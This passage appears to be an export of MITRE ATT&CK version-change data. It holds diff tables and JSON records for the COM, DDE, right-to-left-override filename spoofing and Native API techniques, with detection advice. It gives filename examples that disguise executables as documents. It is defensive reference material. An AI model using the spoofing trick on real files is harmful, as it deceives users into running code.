| > | for local code execution. COM is an inter-process communica | > | for local code execution. COM is an inter-process communica | ||
| > | tion (IPC) component of the native Windows application progr | > | tion (IPC) component of the native Windows application progr | ||
| > | amming interface (API) that enables interaction between soft | > | amming interface (API) that enables interaction between soft | ||
| > | ware objects, or executable code that implements one or more | > | ware objects, or executable code that implements one or more | ||
| > | interfaces.(Citation: Fireeye Hunting COM June 2019) Throug | > | interfaces.(Citation: Fireeye Hunting COM June 2019) Throug | ||
| > | h COM, a client object can call methods of server objects, w | > | h COM, a client object can call methods of server objects, w | ||
| > | hich are typically binary Dynamic Link Libraries (DLL) or ex | > | hich are typically binary Dynamic Link Libraries (DLL) or ex | ||
| > | ecutables (EXE).(Citation: Microsoft COM) Various COM inter | > | ecutables (EXE).(Citation: Microsoft COM) Remote COM executi | ||
| > | faces are exposed that can be abused to invoke arbitrary exe | > | on is facilitated by [Remote Services](https://attack.mitre. | ||
| > | cution via a variety of programming languages such as C, C++ | > | org/techniques/T1021) such as [Distributed Component Object | ||
| > | , Java, and [Visual Basic](https://attack.mitre.org/techniqu | > | Model](https://attack.mitre.org/techniques/T1021/003) (DCOM | ||
| > | es/T1059/005).(Citation: Microsoft COM) Specific COM objects | > | ).(Citation: Fireeye Hunting COM June 2019) Various COM int | ||
| > | also exist to directly perform functions beyond code execut | > | erfaces are exposed that can be abused to invoke arbitrary e | ||
| > | ion, such as creating a [Scheduled Task/Job](https://attack. | > | xecution via a variety of programming languages such as C, C | ||
| > | mitre.org/techniques/T1053), fileless download/execution, an | > | ++, Java, and [Visual Basic](https://attack.mitre.org/techni | ||
| > | d other adversary behaviors related to privilege escalation | > | ques/T1059/005).(Citation: Microsoft COM) Specific COM objec | ||
| > | and persistence.(Citation: Fireeye Hunting COM June 2019)(Ci | > | ts also exist to directly perform functions beyond code exec | ||
| > | tation: ProjectZero File Write EoP Apr 2018) | > | ution, such as creating a [Scheduled Task/Job](https://attac | ||
| > | k.mitre.org/techniques/T1053), fileless download/execution, | ||||
| > | and other adversary behaviors related to privilege escalatio | ||||
| > | n and persistence.(Citation: Fireeye Hunting COM June 2019)( | ||||
| > | Citation: ProjectZero File Write EoP Apr 2018) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use Windows Dynamic Data Exchange (DDE) to e | t | 1 | Adversaries may use Windows Dynamic Data Exchange (DDE) to e |
| > | xecute arbitrary commands. DDE is a client-server protocol f | > | xecute arbitrary commands. DDE is a client-server protocol f | ||
| > | or one-time and/or continuous inter-process communication (I | > | or one-time and/or continuous inter-process communication (I | ||
| > | PC) between applications. Once a link is established, applic | > | PC) between applications. Once a link is established, applic | ||
| > | ations can autonomously exchange transactions consisting of | > | ations can autonomously exchange transactions consisting of | ||
| > | strings, warm data links (notifications when a data item cha | > | strings, warm data links (notifications when a data item cha | ||
| > | nges), hot data links (duplications of changes to a data ite | > | nges), hot data links (duplications of changes to a data ite | ||
| > | m), and requests for command execution. Object Linking and | > | m), and requests for command execution. Object Linking and | ||
| > | Embedding (OLE), or the ability to link data between documen | > | Embedding (OLE), or the ability to link data between documen | ||
| > | ts, was originally implemented through DDE. Despite being su | > | ts, was originally implemented through DDE. Despite being su | ||
| > | perseded by [Component Object Model](https://attack.mitre.or | > | perseded by [Component Object Model](https://attack.mitre.or | ||
| > | g/techniques/T1559/001), DDE may be enabled in Windows 10 an | > | g/techniques/T1559/001), DDE may be enabled in Windows 10 an | ||
| > | d most of Microsoft Office 2016 via Registry keys. (Citation | > | d most of Microsoft Office 2016 via Registry keys. (Citation | ||
| > | : BleepingComputer DDE Disabled in Word Dec 2017) (Citation: | > | : BleepingComputer DDE Disabled in Word Dec 2017) (Citation: | ||
| > | Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advi | > | Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advi | ||
| > | sory Nov 2017) Microsoft Office documents can be poisoned w | > | sory Nov 2017) Microsoft Office documents can be poisoned w | ||
| > | ith DDE commands (Citation: SensePost PS DDE May 2016) (Cita | > | ith DDE commands (Citation: SensePost PS DDE May 2016) (Cita | ||
| > | tion: Kettle CSV DDE Aug 2014), directly or through embedded | > | tion: Kettle CSV DDE Aug 2014), directly or through embedded | ||
| > | files (Citation: Enigma Reviving DDE Jan 2018), and used to | > | files (Citation: Enigma Reviving DDE Jan 2018), and used to | ||
| > | deliver execution via [Phishing](https://attack.mitre.org/t | > | deliver execution via [Phishing](https://attack.mitre.org/t | ||
| > | echniques/T1566) campaigns or hosted Web content, avoiding t | > | echniques/T1566) campaigns or hosted Web content, avoiding t | ||
| > | he use of Visual Basic for Applications (VBA) macros. (Citat | > | he use of Visual Basic for Applications (VBA) macros. (Citat | ||
| > | ion: SensePost MacroLess DDE Oct 2017) DDE could also be lev | > | ion: SensePost MacroLess DDE Oct 2017) DDE could also be lev | ||
| > | eraged by an adversary operating on a compromised machine wh | > | eraged by an adversary operating on a compromised machine wh | ||
| > | o does not have direct access to a [Command and Scripting In | > | o does not have direct access to a [Command and Scripting In | ||
| > | terpreter](https://attack.mitre.org/techniques/T1059). | > | terpreter](https://attack.mitre.org/techniques/T1059). DDE e | ||
| > | xecution can be invoked remotely via [Remote Services](https | ||||
| > | ://attack.mitre.org/techniques/T1021) such as [Distributed C | ||||
| > | omponent Object Model](https://attack.mitre.org/techniques/T | ||||
| > | 1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019) |
March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique)\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1036/002",
"external_id": "T1036.002"
},
{
"source_name": "Infosecinstitute RTLO Technique",
"description": "Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019.",
"url": "https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/"
},
{
"source_name": "Trend Micro PLEAD RTLO",
"description": "Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/"
},
{
"source_name": "Kaspersky RTLO Cyber Crime",
"description": "Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019.",
"url": "https://securelist.com/zero-day-vulnerability-in-telegram/83800/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"File: File Metadata"
],
"x_mitre_detection": "Detection methods should include looking for common formats of RTLO characters within filenames such as \\u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-14 21:01:59.733000+00:00\", \"old_value\": \"2020-03-29 20:16:36.316000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\\\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\\\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique)\\n\\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.\", \"old_value\": \"Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \\\\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\\\u202Egnp.js will be displayed as photo_high_resj.png.\\n\\nA common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named March 25 \\\\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\\\u202Egnp.js will be displayed as photo_high_resj.png.\\n+Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\\\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\\\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique)\\n \\n-A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.\\n+Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use the right-to-left override (RTLO or RLO) | t | 1 | Adversaries may abuse the right-to-left override (RTLO or RL |
| > | character (U+202E) as a means of tricking a user into execu | > | O) character (U+202E) to disguise a string and/or file name | ||
| > | ting what they think is a benign file type but is actually e | > | to make it appear benign. RTLO is a non-printing Unicode cha | ||
| > | xecutable code. RTLO is a non-printing character that causes | > | racter that causes the text that follows it to be displayed | ||
| > | the text that follows it to be displayed in reverse.(Citati | > | in reverse. For example, a Windows screensaver executable na | ||
| > | on: Infosecinstitute RTLO Technique) For example, a Windows | > | med <code>March 25 \\u202Excod.scr</code> will display as <co | ||
| > | screensaver executable named <code>March 25 \\u202Excod.scr</ | > | de>March 25 rcs.docx</code>. A JavaScript file named <code>p | ||
| > | code> will display as <code>March 25 rcs.docx</code>. A Java | > | hoto_high_re\\u202Egnp.js</code> will be displayed as <code>p | ||
| > | Script file named <code>photo_high_re\\u202Egnp.js</code> wil | > | hoto_high_resj.png</code>.(Citation: Infosecinstitute RTLO T | ||
| > | l be displayed as <code>photo_high_resj.png</code>. A commo | > | echnique) Adversaries may abuse the RTLO character as a mea | ||
| > | n use of this technique is with [Spearphishing Attachment](h | > | ns of tricking a user into executing what they think is a be | ||
| > | ttps://attack.mitre.org/techniques/T1566/001)/[Malicious Fil | > | nign file type. A common use of this technique is with [Spea | ||
| > | e](https://attack.mitre.org/techniques/T1204/002) since it c | > | rphishing Attachment](https://attack.mitre.org/techniques/T1 | ||
| > | an trick both end users and defenders if they are not aware | > | 566/001)/[Malicious File](https://attack.mitre.org/technique | ||
| > | of how their tools display and render the RTLO character. Us | > | s/T1204/002) since it can trick both end users and defenders | ||
| > | e of the RTLO character has been seen in many targeted intru | > | if they are not aware of how their tools display and render | ||
| > | sion attempts and criminal activity.(Citation: Trend Micro P | > | the RTLO character. Use of the RTLO character has been seen | ||
| > | LEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be | > | in many targeted intrusion attempts and criminal activity.( | ||
| > | used in the Windows Registry as well, where regedit.exe dis | > | Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO C | ||
| > | plays the reversed characters but the command line tool reg. | > | yber Crime) RTLO can be used in the Windows Registry as well | ||
| > | exe does not by default. | > | , where regedit.exe displays the reversed characters but the | ||
| > | command line tool reg.exe does not by default. |
NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1106",
"external_id": "T1106"
},
{
"source_name": "NT API Windows",
"description": "The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.",
"url": "https://undocumented.ntinternals.net/"
},
{
"source_name": "Linux Kernel API",
"description": "Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.",
"url": "https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html"
},
{
"source_name": "OutFlank System Calls",
"description": "de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.",
"url": "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/"
},
{
"source_name": "CyberBit System Calls",
"description": "Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.",
"url": "https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/"
},
{
"source_name": "MDSec System Calls",
"description": "MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.",
"url": "https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/"
},
{
"source_name": "Microsoft CreateProcess",
"description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.",
"url": "http://msdn.microsoft.com/en-us/library/ms682425"
},
{
"source_name": "GNU Fork",
"description": "Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.",
"url": "https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html"
},
{
"source_name": "Microsoft Win32",
"description": "Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.",
"url": "https://docs.microsoft.com/en-us/windows/win32/api/"
},
{
"source_name": "LIBC",
"description": "Kerrisk, M. (2016, December 12). libc(7) \u2014 Linux manual page. Retrieved June 25, 2020.",
"url": "https://man7.org/linux/man-pages//man7/libc.7.html"
},
{
"source_name": "GLIBC",
"description": "glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.",
"url": "https://www.gnu.org/software/libc/"
},
{
"source_name": "Microsoft NET",
"description": "Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.",
"url": "https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework"
},
{
"source_name": "Apple Core Services",
"description": "Apple. (n.d.). Core Services. Retrieved June 25, 2020.",
"url": "https://developer.apple.com/documentation/coreservices"
},
{
"source_name": "MACOS Cocoa",
"description": "Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.",
"url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1"
},
{
"source_name": "macOS Foundation",
"description": "Apple. (n.d.). Foundation. Retrieved July 1, 2020.",
"url": "https://developer.apple.com/documentation/foundation"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Gordon Long, Box, Inc., @ethicalhax",
"Stefan Kanthak"
],
"x_mitre_data_sources": [
"Process: OS API Execution",
"Module: Module Load"
],
"x_mitre_detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"macOS",
"Linux"
],
"x_mitre_remote_support": false,
"x_mitre_version": "2.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 21:24:30.764000+00:00\", \"old_value\": \"2020-07-01 16:19:54.646000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\\n\\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\\n\\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\\n\\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).\", \"old_value\": \"Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\\n\\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\\n\\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\\n\\nAdversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.\", \"diff\": \"--- \\n+++ \\n@@ -1,7 +1,7 @@\\n-Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\\n+Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\\n \\n-Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\\n+Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\\n \\n Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\\n \\n-Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.\\n+Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"OutFlank System Calls\", \"old_value\": \"Microsoft CreateProcess\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.\", \"old_value\": \"Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/\", \"old_value\": \"http://msdn.microsoft.com/en-us/library/ms682425\"}, \"root['external_references'][4]['source_name']\": {\"new_value\": \"CyberBit System Calls\", \"old_value\": \"GNU Fork\"}, \"root['external_references'][4]['description']\": {\"new_value\": \"Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.\", \"old_value\": \"Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/\", \"old_value\": \"https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html\"}, \"root['external_references'][5]['source_name']\": {\"new_value\": \"MDSec System Calls\", \"old_value\": \"Microsoft Win32\"}, \"root['external_references'][5]['description']\": {\"new_value\": \"MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.\", \"old_value\": \"Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.\"}, \"root['external_references'][5]['url']\": {\"new_value\": \"https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/\", \"old_value\": \"https://docs.microsoft.com/en-us/windows/win32/api/\"}, \"root['external_references'][6]['source_name']\": {\"new_value\": \"Microsoft CreateProcess\", \"old_value\": \"LIBC\"}, \"root['external_references'][6]['description']\": {\"new_value\": \"Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.\", \"old_value\": \"Kerrisk, M. (2016, December 12). libc(7) \\u2014 Linux manual page. Retrieved June 25, 2020.\"}, \"root['external_references'][6]['url']\": {\"new_value\": \"http://msdn.microsoft.com/en-us/library/ms682425\", \"old_value\": \"https://man7.org/linux/man-pages//man7/libc.7.html\"}, \"root['external_references'][7]['source_name']\": {\"new_value\": \"GNU Fork\", \"old_value\": \"GLIBC\"}, \"root['external_references'][7]['description']\": {\"new_value\": \"Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.\", \"old_value\": \"glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.\"}, \"root['external_references'][7]['url']\": {\"new_value\": \"https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html\", \"old_value\": \"https://www.gnu.org/software/libc/\"}, \"root['external_references'][8]['source_name']\": {\"new_value\": \"Microsoft Win32\", \"old_value\": \"Microsoft NET\"}, \"root['external_references'][8]['description']\": {\"new_value\": \"Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.\", \"old_value\": \"Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.\"}, \"root['external_references'][8]['url']\": {\"new_value\": \"https://docs.microsoft.com/en-us/windows/win32/api/\", \"old_value\": \"https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework\"}, \"root['external_references'][9]['source_name']\": {\"new_value\": \"LIBC\", \"old_value\": \"Apple Core Services\"}, \"root['external_references'][9]['description']\": {\"new_value\": \"Kerrisk, M. (2016, December 12). libc(7) \\u2014 Linux manual page. Retrieved June 25, 2020.\", \"old_value\": \"Apple. (n.d.). Core Services. Retrieved June 25, 2020.\"}, \"root['external_references'][9]['url']\": {\"new_value\": \"https://man7.org/linux/man-pages//man7/libc.7.html\", \"old_value\": \"https://developer.apple.com/documentation/coreservices\"}, \"root['external_references'][10]['source_name']\": {\"new_value\": \"GLIBC\", \"old_value\": \"MACOS Cocoa\"}, \"root['external_references'][10]['description']\": {\"new_value\": \"glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.\", \"old_value\": \"Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.\"}, \"root['external_references'][10]['url']\": {\"new_value\": \"https://www.gnu.org/software/libc/\", \"old_value\": \"https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1\"}, \"root['external_references'][11]['source_name']\": {\"new_value\": \"Microsoft NET\", \"old_value\": \"macOS Foundation\"}, \"root['external_references'][11]['description']\": {\"new_value\": 